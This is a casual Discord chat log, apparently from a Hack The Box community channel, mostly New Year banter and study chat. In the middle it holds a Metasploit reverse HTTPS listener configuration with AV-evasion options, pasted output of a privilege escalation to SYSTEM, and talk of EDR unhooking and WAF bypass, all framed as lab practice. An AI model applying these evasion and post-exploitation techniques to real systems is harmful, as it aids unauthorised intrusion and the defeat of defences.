#general
1 messages ยท Page 360 of 1
im doing the challenges section on HTB and one of them was for server side template injection. i dont usually do the challenges section so i thought id give it a go. and im glad i did. because that exploit made me belly laugh
Always use condoms!
oh wait you said SSTI...
nvm then
read wrong
lmao

cut -d can be evil ๐
im doing one rn
Hi peopleee
One question for you! Are necessary some particular roles to react to any message in this server?
Lets play chess
Because outside of here I can react everything, but here I can't
Am I missing something?
i think its connected to noob rank
@visual hollow
play chess with me
Oh okay, so I need to grow up my rank first
Later, Iโm going shop
๐

why are all engineers like this
dual boot will most likely cause issues
yeah
dont recommend
ask to kratos
he didn't want any of my advice and went straight to dualboot
lost data in the process after ignoring other advice
don't be kratos
yeah I was looking at it
I tried once but didn't have enough time to explore the concept
did you use this?
i thrive on issues
looking forward to

havent used yet
average pentester be like
if you do feel free to let me know how it helps you in dm or here
well technically we both used it in tailwind
there are issues that are just made of pain, but you must experience them in order to know why we recommend not to use dualboot
Issues for breakfast, lunch and dinner
i hate vms tho
qemu with virtman
that brings some problems with it tho
these are good problems
i can't imagine willingly using windows as a daily driver in 2026
no, it's the other way around
it's "easy" to use because it's all you're used to
because microsoft had ful market capture in the 90s and monopolised the personal computing space
so it's what everyone got used to
which is why it feels "easy" to use, but actually it's horrible
how so
you'll have to get used to some other operating systems to see why
I'm not going to reason you into it
Happy nee
ive used multiple linux distros but i honestly think windows is more straightforward
successful ragebait

Yooo bing bang
when the new session will start?
My modifications are as follows: crash crash internal error 200
๐
beep boop
boop beep
what you up to today froj
What is elixir?
I am studying retired boxes in the lab
Yes right now i think its just for practise, to move around commands and feel natural
Sounds good man, best of luck
And also its learning details about systems
like yesterday i had some problems trying to do an XML/XSLT injection and make an uploaded file call back to my pwnbox xD
hours
and eventually got it right
thankfully these days i got AI to reflect ideas with
Nice! Itโs one of those things where once youโve done it once, itโll be far quicker in the future so :)
Good work
@undone fossil Are you going to develop an app or something with this elixir?
<html>
<title>My Masterpiece</title>
<body>
<p>I made an app. It might be good. It might be evil. Who knows?</p>
<p>Probably works on Tuesdays. Maybe.</p>
<p>If it breaks your computer, itโs technically a feature.</p>
</body>
</html>
reee
where is the <head>???
your masterpiece is headless
no <!DOCTYPEhtml>? fake front-end dev 
u right
https://www.youtube.com/watch?v=AsKUw4TEmUY i did however make a remake of minecraft in under 2k lines of js
oh im almost at 12k subs yay
i shouldn't have deleted so many videos lol
Maybe some day, for now just learning the language though 
Hacky new years everyone
Please tell me nobody made that joke yet. I literally just came up with it by the way. So clever
๐ ๐พ
this is a dream
Whats the most used languages used by malware builders? java, python or?
english
-# I didn't make the joke I was just sending a gif you reminded me of 
C
Like cumulatively? C/cpp
Yes C for hooking
ok cool
no one makes uefi malware womp womp
๐ช
Well... some people do 
i probably wont be getting anywhere near that in the near future, the list is too long already with stuff i wanna look at 
like the US government
@native plume get hooked pls
who are these people i mean what
Locked in vs hooked.
First meme of 26
Let's go
They scare me they have money to pay for things
This is my first 2026 meme in gallery
meow meow
Even worse, they take people's money and use it to pay people
hiss hiss
Sorry I meant first cyber related meme. Cyber security is my entire personality
Last one of 2025 ๐
Then they give the taxes to criminals to buy food what is this satanic idiology
You got the golden cup
Must be true
Hello all and happy new year to everyone!! I'm planning on starting into cyber this year and I 'm looking for a laptop as I don't want to use my main pc for cyber practicing and so.
I was wandering if there's anyone here who could recommend me or advise me on what to search for and check before getting a new laptop.
Thank you in advance!!
Guys the problem is the media religion and politics and opinions there i said it just being honest
That question is really hard to answer without knowing your budget
You pick a budget and then decide the specs and then find appropriate shit
Spend the money here on cubes and course subscriptions. Use a VM htb shows you how to setup in the course
Better investment
Nop
Can we get liberty reserve back for like a half hour government i still got my acc info plz rofl
As it will be my starter laptop, maybe around 600 โฌ?
They can't pirate the cubes
You talking about the friggin TV ads they used to play to sell you .1g of gold plated buffalo dollar for $50?
na the currancy that was seized lol when u had to use alert pay to transfer paypal bc paypal didn't let u use debit cards type beat
i bought one around that prize that has a basic graphics card thats not integrated, so it can be actually used to do more stuff than just browsing the web

Oh I skipped that season. I started with the eBay/PayPal MasterCard and stopped watching after that but picked back up around the venmo arc
all the cheapest laptops are pure garbonzobeans anyways, they are all macbooks and chromebooks
take that money, spend it on learning materials OR upgrading your existing compter, you already have a computer, just spin up a VM and start labbing. I don't really think it's worth buying a separate workstation for it. It's not like you'll be hacking on-the-go anyway.
For the actual payload? C/++
I hear cops like mac and chromebooks
I recently got a laptop with similar budget , it's Lenovo thinkbook 7
Im pretty satisfied with it, just need to upgrade the hard disk later (probably 100โฌ or more)
Higher level languages are common also but C/++ definitely takes the majority
probably because they come included with spyware? 
imagine using cpython to write malware that generates and compiles agents in C 
wait u mean that mac has a built in ssh backdoor unless you disable guest and remote login at the firmware lvl noooo they would never
I mean what
ofc the would never 
neither would intel nor nvidia
Wait you mean I can spout unbacked claims
lardy dar
I mean what
Isn't that just any machine? If I have complete physical access I ain't booting it, I'm yanking the drives 
Mac users would know
oh no i forgot to do
sudo defaults write /Library/Preferences/com.apple.loginwindow DisableFDEAutoLogin -bool YES
oh wait im on a windows pc
im trippin
Stop tripping more hacking
@proper fractal i dont know what apple or google does with their products, its just a joke. i dont like them
personal preference
Wild
literally just grab the drives
if they ain't encrypted I don't even have to mess with the OS
I like gmail they can track that crap all they want even the photos and the simcard idc just let me see the websocket traffic google thanks
It kept mentioning my items in arriving on Gmail, even tho i received item and dismissed the notification
yeah i use gmail too for a lot of stuff in daily life, on my personal computer i use protonmail instead
I don't even use a vpn if they want me they will come uwu
What they gonna do see my search history and the dorks i google lol
Those were decade old half tb hdd
in high school a friend brought a suitcase to school and stole an entire tower pc
@proper fractal only need vpn if you wanna sail the seven seas 
That's nice
I only use public internet for shady things like a starbucks that im not inside
wifi super extender goes brrr

i mean what i only do things that jesus would do
I see alot of tejas made equipment in store (trash) room at office
But i don't think they'll give it away for free (and I don't even have any use for it)
But they are just there doing nothing
bro's tryna pick something that doesn't get him in trouble... accessing root on a computer that you technically don't own is gonna get you in trouble...
Any hacking this year?
So do all us
yes that's 10 years if they want to push it
CFAA is a mf
did the easiest box on the platform right as I woke up 
Which one
Microsoft just rejected my bug :(
lots of academy nontheless hacking is hacking
I haven't touched eloquia yet
Blue, isn't it eternal blue?
yes only good things ๐
shodan is like if world of warcraft was a browser
Did u just slapped the exploit from meaterpeeter
yeah it was, embarassed to say took me a while cos that's not one of the first things I look for, thank god I look at the OS 
wbu
u should write a blog like hacking wrapped 2025

try hacking without using metasploit or netcat good luck
ez
I use socat anyway 
telnet
The name was dead giveaway and i think that machine has lowest blood time in all machines
telnet isnt that grandmas PC from 1998?
2 mins for both user & root which is kinda stupid since you get both for just 1 exploit
i hear them arpanets still be kickin it
I remember ippsec said he did some machine within seconds, in some ted talk
Nothing new yet this year. Going into 2026 with 8 bugs still in the queue. So that will be a nice start to the year when they are paid (already accepted)
With tons of OSINT and scripting
Are you talking about the retire box called BLUE?
I can post some stats about where I got the majority of my bounties, what other info would you want to hear?
it just depends on whether you've seen the attack path before
why is the printer printing help who used pret reeee
if you have the tooling to hand and get lucky with a similar setup to what you've seen before, its basically a case of "how quickly can you run the tooling"
how u found the initial bug/recon process
its pretty trivial to get from bug to exploit but to find the bug is difficult
How much time they took
And how much u earned
we must take this time and new year to learn about ssl attacks
super saiyan L
LOL
Last day at work tomorrow then I can start new job and spend some time on HTB peaceful
@devout sail i actually did this one this morning, it was actually the correct difficulty rating on it. Easy 
broth is the secret
mfw most ssl attacks require access to a host anyways to be made widely useful 
whats the current job and whats the new job
allegedly
"allegedly"
Did u do it with premade exploits which does 1 click root?
Yes. i did watch some video how to do it using Empire also but didnt test other methods
hbu
Current is procurement/project related
New is me working in Data Center (job role not decided as it's same company, so hopefully everything i can touch)
Inshallah soon
Empire?
empire c2
inshallah
older project, but can still do the job i guess
openssl s_client -connect example.com:443 -quiet
openssl x509 -req -in client.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out client.crt
I haven't used any c2
Tried mythical in prolabs but uhh didn't like it
I got some goals for this year wife is one of them
i mean metasploit is a c2 so

checkmate athiest
haha
So i did use c2 ๐
u already got a house
its all good
Here's a breakdown by percentage, not much synack work this year
apparently so!
my mouse doesn't work, time to learn vim
mythic is a great project but so so overkill for a lab
remember if you borrow a house without permission the cops are gonna show up when the owner gets home
It's really good but gotta learn Ruby to truly take advantage
I started without understanding what exactly a c2 is and no context
So i didn't like it.
Would enjoy when I get to use it properly ig
damn im in the future
If you want to modify it yeah, but even ootb it has a ton of features that folk dont use
guys just drink more liquor ur hangover will go away then chase it with water trust me
Can I borrow your car?
Gotta take a quick look into future
the pistions blew drifting sorry ๐
I'll use the steam locomotive ๐
I mean if you gonna use it on HTB then highly likely you need a custom exploit
sudo apt update engine && sudo apt update transmission -y; nope didn't work
Update repo
Cos it's upgrade ๐คฃ
I'm talking more about the payloads, listener configuration & post exploitation stuff
didn't the guy who made the DeLorean get arrested for doing a drug deal with the cartel or something
update just grabs data from le repos 
Yeah the evasion features used to be good enough
e.g. something like this is very useful
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_winhttps
set LHOST tun0
set LPORT 443
set HandlerSSLCert ./msf.pem
set StagerVerifySSLCert true
set AutoUnhookProcess true
run
guys it's 2026 and you haven't watched hackers yet smh
Took you 2 tries๐
custom cert & unhook combined will have you around AV most of the time, so you're pretty much good enough for labs ootb
with v quick setup time which is nice
Never used the last 3.options ๐
yeah i always mess up the first one heh
the first 2 of those are supah useful for getting around simple DPI sigs (also the default self-signed https cert is signatured, so you avoid that too)
I just want to say good job for not being in jail that's all good day lad
Someone should make an annoying machine, anything remotely sus get AVed
I've been tempted to make one with my own "EDR" on it
avast
threat has been detected
signaturing stuff like impacket example scripts and whatnot
But the contract makes HTB own all of the stuff there
So your EDR will be owned by them??
yeah that's why i wouldnt do it tbh
tcphijacking is pretty cool and indirect syscalls
its a lot of effort for little gain imo
indirect syscalls are honestly louder than just using the winapi directly sadly
now try unhooking the windows api without taking the fan or battery out or hard restting
Yep even for insane, maybe prolabs can get u some good stuff
Not sure if community can make them or how much u get paid
unhooking also noisier
that's why most malware loads into kernel32.dll
its like unplugging CCTV and expecting someone not to notice
far from true
it's like telling ur woman she's wrong and not expecting an argument
So the trick is to unhook the guards who are watching CCTV
Henlo
I've said it and she said "you are right" that's fucking scary
your take is purely subjective
oh i know it's like uhhhhhhhhhhhhhhhhhhhhhh it's coming but when
plays jaws theme
I dunno jaws theme
๐ฎ
Yeah I'll play the uhh idk i don't remember any
Anyone give me latest dataset link for cybersecurity using my Research paper.

Mornin frost
I'm sorry, I hope you feel better
Mankind's endless struggle for sure
The game?
Ye new Vegas
Pro tip for the vibes, tune your pip boy radio to the music radio stations
I got spurssss that jingle jangle jingle ๐ถ
JINGLE JANGLE
It's very fun lining up headshots on people playing fun happy music in the background lmao

Also lock it to 60
It's notoriously unstable at anything higher
And sometimes still
#dreampop #dreamwave #synthpop
A track from FM-84, "Atles" 2016 album. I'm not the owner of this song. If you like this music you can buy it from https://fm84.bandcamp.com/album/atlas
released April 25, 2016
Been jamming this
And tech noir 2 from gunship
happy new year ๐ ๐ ๐ฅณ
Buy 'Unicorn' and stream 'Tech Noir 2': https://linktr.ee/gunshipmusic
The whole gang is back for the blockbuster sequelโฆ
Join GUNSHIP, John Carpenter, Timmy Cappello, Charlie Simpson and Lee Hardcastle for the claymation party of the century.
Creating the Tech Noir 2 music video has been a long and winding road. Weโd like to extend our ...
Hi happy new year ๐
Iโd like to get better at coding, I know a little bit about css/html but I need a lot more experience where should I start?
i don't feel entirely qualified to suggest, but i'll try: codecademy for learning how to write in programming languages, though i've taken cs classes. for networking, would suggest cisco certified network associate (ccna) pipeline or comptia network+
i started programming by developing video games, but that didn't take me very far by itself
hack the box has really helped me with respect to cyber
the academy is very good
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00000c02-090c-ffff-7f47-7f426bd63993
[*] DCOM obj OXID: 0xb8f8351cffd6d54f
[*] DCOM obj OID: 0x64cba73310cfa2f5
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 892 Token:0x732 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2680

nice
If it's web dev then I recommend the Odin Project
I cba to re-answer so here's some screenshots ๐
If you want project ideas lmk

and if it's not just webdev but the broader enterprises of computer science, then: https://ossu.thinkific.com/courses/computer-science-v7
here is how i see it
com sci stuff is good and absolutely do it understand things and if possible get a degree too
but at the ened of the day you have to deliver impact
so try to learn stuff that will help you make money as well
i say: learn stuff that brings you joy in life
how would you bring joy if you got no shelter food or cloths
and find a balance between the two
By making everyone else miserable 

@glacial echo hey u still around?
Super user ID
||sussy user ID||
append "in Computer" in query.
@scenic maple any man who must say, "I am king" is no true king
i am no king
So this month I promised myself I'd study
It is January first
OH BOY PROMISES
Anyway I will gain much power
BEAT YO ASS AND HIDE THE BIBLE IF GOD WATCHIN
@supple plume vro ai models have 0 idea abt layers
they just straight up keep lying all day
even after i fed it the source
Yep they are useless
@scenic maple Could i ask you some question about starting point machine? I'm doing it right now, but there is something that is not ok with the process
I tried that too
Imo
just check the writeup or ask in #starting-point i dont those so long ago i have forgotten
It's a rtfm thing
cold world
Nono but it's not how can i solve or not, i've already solved
But the point to me was: is it worth to me to learn this for what I am doing? Not at that point so... some day
However ok, i'll asking there
i mean i like rtfm but i dont want to read this whole thing man its so biggly big [redacted]
That's exactly what I thought
Which one is not right
this is part 1 introduction btw
there a lot more


CPTS or CAPE? I'm just thinking if I could jump on the CAPE as I finished alr the RTO
if anyone can give suggestion or recos, much more appreciated
Hi. Noob here. Where can I find forums on the website to read up on discussions around certain boxes?
Thank you
I've asked in #starting-point
Beautiful game imo, what you all think about it?
Clair Obscur is a work of art, I've platinum'd the game on PS5
Shell poppinโ, reverse connect, payload in your inbox,
You kiddinโ? Iโm kiddinโโฆ nah, Iโm kiddinโ on your blocks.
Tryna root my way through your weak-ass locks,
Hack The Box taught me more than all your talkinโ talks.
is that resident evil or am i trippin rn
Clair Obscur: Expedition 33
nice
Not at all
interesting
Considering this is a game that came out recently and resident evil 4 is from the PlayStation 2
I wanted to whine about something here but instead of that I am going to send this emoji: 
There enjoy cubical shaped bat turds
Wombat
xwing
Which is a marsupial
Not even that man...
wait so is twitter an x wing now
This 2026 is so complicated
i can't call it x sorry elon
They're native to Australia
Australia of couse
They're just little dudes leave em be!
I wish my 1 letter acc wouldn't have gotten suspended ๐ mean twitter mods
I def deserved it at the time tho
lol
I'm expecting another slow day
have you tried time warping?
Meant workflow wise
heh
Holidays
Heck I'd be happy answering phones at this point freelance dev work sucks
what do u do
Is there any good resource to bypass wafs? Maybe some tool to modify xss and sqli payloads acording to the waf.
website security building ect penetration testing graphics design anything i can find
all the work ive done i can't put on paper bc of nda's
well this is basic shit but https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c
Thanks I'll save this for later
I have an owasp email heh
something
automated
to find rules break
there is a mod
he is just offilne
but the moment I write somethin
he is back
am I rooted?
Not how any of that works
but how do u do all of those as a single person
I spend all of my time on the computer
usually people do 1 or 2 things right
yeah but you cant be good on so many things to the point that you can make money out of it
I have entirely too much time on my hands and i like learning
maybe ur just on a diff league
I just really like learning about web apps
hmmmm

why do people still use mybb it's so broken it's unreal
Late night studying is gonna be an interesting feeling again
I work 2nd
I prefer the grave yard shifts when i worked at a warehouse as a lead i used to work the 7pm to 7am shift
wut
How does it look like a Jetta this is the interior 
yeah and the light
?????????
i used to have one lol
i had a 09 jetta it looks a lot like that back window and the back windsheild fom the inside
New years resolution: Hack on the beach
Prove me wrong
This is the best resolution
๐คฃ
With a PINA CAlota
Piรฑa colada
with the tooth pick and an umbrella on it
one for each hand?
If you do what you love you will never work a day in your life ๐
For all remote job hackers
actually it could be a Toyota Corolla
there should be an ai for that
You can't tell from the position of the lights or the interior at all because this looks like every other fuckin sedan from the 90s to the 2000s ๐ญ
It's hardly OSINT I just have years of mechanics in my lineage
Good morning gang
My family builds older show cars our last one was a 53 chevy pickup
Uncle does restorations and collision repair
my granddad is an old gearhead he builds clasics he has a 67 Chevelle ss i would love to have that car one day bc of the engine work that's done to it
2026 just started it already feels like february
I'm sober and my mouth is dry af gang. I think I need some water
not me i got dr pepper boi
any hacking in january?
I know yo ass ainโt doing hacking

don't know if I can call what I do "hacking" but i'll try
been 5 years i'm still a complete beginner
import os
os.system("start cmd.exe /c = echo hello && start write.exe echo just because")
IT WAS A MISINPUT
we all start somewhere
I started with a book
๐งข
How was everyone's new years celebration?
you see this is why the entry level jobs want 5+ years of exp
good yours?
im supposed to do pentesting at work i swear to god i don't even know what i'm doing half the time
I couldn't tell if it was gunshots or fireworks where i live
It was good. First time I got intoxicated felt very interesting to say the least
that you?
ever been to atlanta on newyears
yes without the part where the pen works
actually this is peak
so if u press the pen harder the ink gets wider
Lol. Best not get used to it too often ๐
did ya wake up this morning with a headache? @terse dirge
wait what u mean first time
how old are u
i think i saw ceald streaming for 12 hours and drinking sojo or whatever thats called
i am pretty sure waking up was messed up
hmm its called soju
and its korean
No I stayed hydrated I think
21
ceald is 21
why doesn't debian come with snort didn't it used to
I was only streaming for almost 4 hours I think
that's crazy
oh lol 
I thought alcohol gives you a hangover and stuff
I don't drink no more
i guess there was time in between or it was a diff person when i went to sleep
its so funny when u hijack streams with cs2
golam are u doing HTB?
htb academy yes sometimes
i am pretty sure even after doing the cwes modules i will get stuck in the exam
thats why i havent finished/taken it
there is also no unofficial cwes prep
I've had headaches before from having a bit too much to drink like after 2 or 3 standard drinks but last night I had a lot more but stayed hydrated 
I get hungry when I drink
@proud moth bro u left me on read?

Next time I'll stick to only vodka or only soju
wow thats cursed
awwwwwwwwwwwwwwwwwwwwwww
Honestly if you do fine in modules you'll do fine in the exam
I'm good in sheets
Been working on it from 5y
MS excel my beloved
thats the thing i regularly get stuck while doing assesments
I hate anything related to MS Office
Excel is good
But the good thing about SA is they force you to redo the module so that you can do it comfortably
Sometimes you just have to know the location of an idea
You shouldn't have said SA ๐ข
Some stuff are better to memorize by heart
Skill Assessment?
No cursing here please. I am the best hacker in here and everybody who wants my training needs to listen to me.
My alarm
Do you have it set everyday
You should be one
I wake up at 9.10 am everyday
And this is my alarm
Every single one of those rings every 10m
And stacks
Seriously I'd turn them off all together
This trick won't work for me lmao
I have mine set at 8 am but I just turn it off once it rings and get some sleep
I disable a few of them while sleeping
So gotta keep backups
Never stay up late if you actually want to wake up that early
Muje goes to snooze for 10m
To turn them off i have to swipe, which is harder to do, snooze works from clicking butt
I swipe too but I guess it's easy for me
I try and fall asleep around 3am
Just place your phone in a way you can swipe and go back to sleep ๐
Way too late
Though sometimes I stay up that late
But yesterday I slept around 8 pm
That will make me stay down not wake up lmao
Are you happy this year
I forgot you enjoy it
I wanted to know can I use metasploitable 2โs vulnerable state to cross reference or compare against a secure system to see if a particular technology is vulnerable
No because I literally got 5 questions about work
These guys should know that I should get some rest
Hi, happy new year ๐
See if someone knew here, they would have told you, maybe ask in hacking general channel
Happy new year
I am in general am I not
How rich are you
The way you work, i wouldn't be surprised if you say, you own 4 mansion and have 3 wife and 2 dozen kids
I don't even have a car
Nobody here is "my father gave me a small loan of a million dollars." ๐
I see
All of that stuff and you cry about car
Nah but you went straight into the mansion stuff lmao
Just work at better place then
Maybe I should
He's gone?
Yeah he can whip you too then
I don't like others hitting you
So nop
why can't I get whipped, too 
Animal aboose
Getting whipped is specific to me
Hmm what happened
Why can't u be the hot and strict boss
And scare and motivate him
is this what peak ragebait looks like?
High level atleast cuz I don't understand it
i may trust people easily but i will never trust module assesment makers
My biggest ragebait so far is moving a Jira ticket to "Done" but it's filled with bugs
after all the things they have done to me
You are "working" for some company
So i don't understand that
You should only work for the thing you are supposed to and that shouldn't be something that takes up 7 days a week ๐
File Uploads assessment made me learn a new language
Oh which one
mine is "couldn't reproduce" (because the support engineer is incompetent)
there was this one time i was fuzzing with ffuf
but it didnt show any diff in size
but when you did in burp it actually worked for whatever the frickin reason
i guess it was a edge case error
Idk but I sweared a lot back then lmao
Funny thing is I'm the one opening the tickets
Problem of knowing alot of language
i asked chatgpt if the file name made using php is random he told me its totally random and no way to guess
So you are actually smart and not just disgustang weeb 
it was just md5sum of original file name
arent u a disghusting weeb too?
Yeah abusing file names is impossible if the server renames it, but for sure the server won't change the content of file, you just have to abuse this
So we are reaching at that point where we ask AI for stuff and then confirm it's wrong
Also extension bypassing is important too
Different
how so
Asking AI for boxes is just a ragebait
peak sad life
finally when you get replaced and get basic income the big evil tech corps made ai bad
is this the biggest conspiracy theory of 2026?
I've seen so sad stuff while using AI that I can't even describe anymore
And we become so dumb and numb in the heads that we sit and laugh at 30 minute stream of someone showing their butts, laughing like crazy. Like that old movie "idiocracy"
time to vibe code 
For your next ticket @native plume
The conspiracy theory of 2026 is that AI only creates slop. Normies will call us tinfoil hatters and then 2 years from now we will be proven right
And still that thing isn't working btw
And yeah there's even more of that but it's not Claude
But I was desperate enough to use it
is bro spending money on claude
Only when desperate
Bro is rich
Turns out even Claude isn't ready
u should hire me bro you are too rich
Guys it's grok other times ๐ญ
imagine having so much money to waste on claude
Gork is this true
Nowadays people just using it to change pictures
I wouldn't be really sad if actually Claude fixed the thing for me
I don't use any of it at all
@grok whip @native plume
Due to my Tegridy
But maybe it's the time to do stuff by hand for that specific thing
a macbook user paying for claude is mega rich imo
cause even after the apple financial disaster of a thing you have
Ok guys I got a great idea
you still got money left to waste on claude
I'm gonna comment on twitter after years
claude doesn't even cost that much
I mean I don't vibecode that much
Gonna comment on chronos art and ask grok to add whip to it
isnt that the most costly model out of the big 4?
Did someone say macbook? 
@devout sail do it

It gets really hard to do everything by hand
you guys should see my setup. its 10 year old parts held together with ductape
And as long as I code review the thing then it's good
wait i have some good code
let me see if i can find
who knows maybe copilot read paints coworkers code
I wouldn't have said anything if it was a simple Wordpress template though
@scenic maple types condes while sleeping, hes a brofessional
I wonder what's the result ๐
can we not
Heya Marcie
Oh that was bad?
yes
No result
Ok
Alright
send him to the gulag
contrary to popular belief, whipping someone is bad -_- and at the very least stretches into non-pg-13 territory
its a crud app anyway
i wonder what fancy people are doing
It's a really fancy crud app too

Work is likely gonna be very slow today I might have time to study
What about rubber band
i really dislike the idea of "programming" being just translating business needs to code
Does bro work for Mr Burns?? Who the hell works the day after new years eve?
I worked yesterday too
Same
It's sad but we get paid for it hopefully
c1oud is probably american
1 more day 
I had Christmas week off
they dont have vacation in america
No worries
it was in this vid
he said translating business needs shouldnt even be called programming
i kinda agree
I'm happy to be workin I was getting bored lol
altho the stream chat started asking funny shit
Programming is for way more than "a businesses needs" lmao
I got cyber's curse
Images won't load :c
But not being able to translate business needs then you can't really program properly for clients
You can still program though
well thats what i am looking for 90% of people just do that or atleast 90% of people who are programmers and employed and that i know of
I mean it is the monetisation route
thats when we become broke
it just feels like a chroe to me
i want to do fncy stuff
but clients dont want that so i cant do it
Yeah depends what you get to dev
I think devving for clients would be far less interesting imo
Rather than for a product
i mean surely the stuff you work at is more fancy than what me and chronos do
Idk what chronos does but maybe
web dev
Mostly webdev but I do mobile sometimes
Maybe then, I donโt have to touch js so itโs a good time to be alive
Hehe yougot competition @native plume
guilty of using react native
Everytime I I get the chance to revive that mobile project I get another mess with web
It's actually Flutter
that same dude sent the same message to me
Half soy
Dang these guys are scary
Got an interview soon on mobile security, we can team up, you make bad code and I find them and we split 10/90 (u/me)
Bad code means a lot of things
thats not a bad offer
๐
I can write code that breaks everywhere if you want
I only get unsolicited ๐
But it's alright no mutuals now
friends no talk to u?
Bad enough to make it look I worked hard to find
I reply in days :D
put the admin creds in a config file
Unless it's cyber chronos
AndroidManifest pls ty

That should be enough for you to have fun
How about we just remove the authentication layer all together
unironically tho check this
https://mas.owasp.org/MASTG/
and the htb path
FUCK IT WHY NOT INVITE THEM IN
I have to get extra money for auth pages
THESE VAMPIRES LOOK TRUSTWORTHY
as long as they cant guess the url we are safe
I just scrolled the chat and found cyberchrommium sent me unsolicited DM at first
Can we ban her?
@native plume this
What is this
ru sure
Lmaooooo
cause we take complaints seriously
what's "hopeslop"?
Oh nop nop, i report properly when I get "bad" unsolicited DMs
pick a side bro
I'm unemployed but I'm not THAT unemployed tbh
I am perpetually in the middle
I'm the driver that's going to jump of the hill
And banning cyber would ruin my fun
you drive there in the winter with summer wheels
I don't even know about this
Changing tyres for season
owasp has a lot of good hackers but no ux designers
Then you live in a great climate
Snow tires are indeed a thing for colder climates
When i got my bike, a huge key got stuck inside it
And I've been driving it with same tyre
My hands are freezing but no snow
I can hold ur hand

Stay back
that is a flammable armor
We rarely get below 10ยฐC
And that too in winter nights
High can go around 45 ig or maybe more
anything over 40 is unberable
the coldest i ever had in my whole life was -33 celsius i think
The coldest I've been is -25
Went into a huge freezer
Without jacket
Came back with swollen finger
With rings on it, so it was very painful
Frostbite in minutes is not great
do you still have that finger
@exotic pendant ping!
I was lazy and thought few minutes would barely hurt ๐
Normal winter is -10 to -15 in Sweden usually, but some years it can go -20 -25 and even like i had -30 and worse
I spent a week camping in forest at -40C
Yep, I've survived worse shit
Frost owes me an apple fritter get that mf
Can u do the same in +40 ๐๏ธ๐๏ธ
how did u survive
He probably made one of those things
-40C!!!? Holy sh-
eating a lot, moving, not being naked
Bro I barely survive at 5C
Insert pee ice gif
no apes?
Not even negative
oh I was there with 100 apes alright
i see now i believe
it's pretty cloudy right now it's in the 60s
Cold is scarier than hot weather ๐
Like I can't even move if it's cold
i mean both kills people but i think cold kills more
wait till you hear about arizona summers
cold is much easier actually. you can always warm yourself up. cooling yourself is much, much, harder
My bones would shatter from the cold
I slept outside at -20 with almost no gear once.
Wim Hof breathing saved my ass
wwhy tho
was there no shelter around?
What's that
I bath using hot water at summer
Lie
its a breathing technique
also, some c* sent a box of apples for breakfast one morning. great, apple icicles.
I can't even use cold water it's too much
You are a weeb and they don't shower
But I drink cold water though
silly question for the challenges is there a way to get the files on htb vm without doing manual transfer
I am not lmao
You can copy the link of the download
And then wget the file
alr ty
I do opposite
I drink normal water but won't heat water (got no geyser so have to heat up by myself) so i just shower with cold water
I can't even move if I bath with cold water
It's just like 2 min of shivering and everything becomes normal
The only problem is when doing hair care
That shit takes me almost an hour
So the shivering timer resets and have to endure more
Hair care is a decent topic
chronos might actually be a girl
I used to hate shampoo and all but now that I'm back to growing it
I need to use fancy aah shampoo
or he might be going bald
No I have hair lmao
On head?
that leaves us with one option
great question
I might oil my hair tomorrow even tho it ruins my whole day
I frogot the oil joey suggested
Good Night!
dont recommend oil

I heat it daily
, got no geyser as well.
I used to put oil on my hair too
chronos has been real quite after the hair question
No shelter. All I had was a 80l backpack to lay on and a thin blanket. Build little snow walls to stop the wind.
Fun night 
Heating can damage the hair though, like if you do it too much
I am lazy
I just have no comments lmao
I thought he went to take pics to send me
How lazy are you? You ain't moving each molecule in water to get it hot, right? Not that much work is needed. Just fill the water and heat it lol.
he went to see where else his hair was
I sleep thirsty instead of getting water
Or not pee before sleeping
u gonna get stones
gems and rubies?
kidney stones
I wonder if I can still get chips
I remember one lazy incident


2026

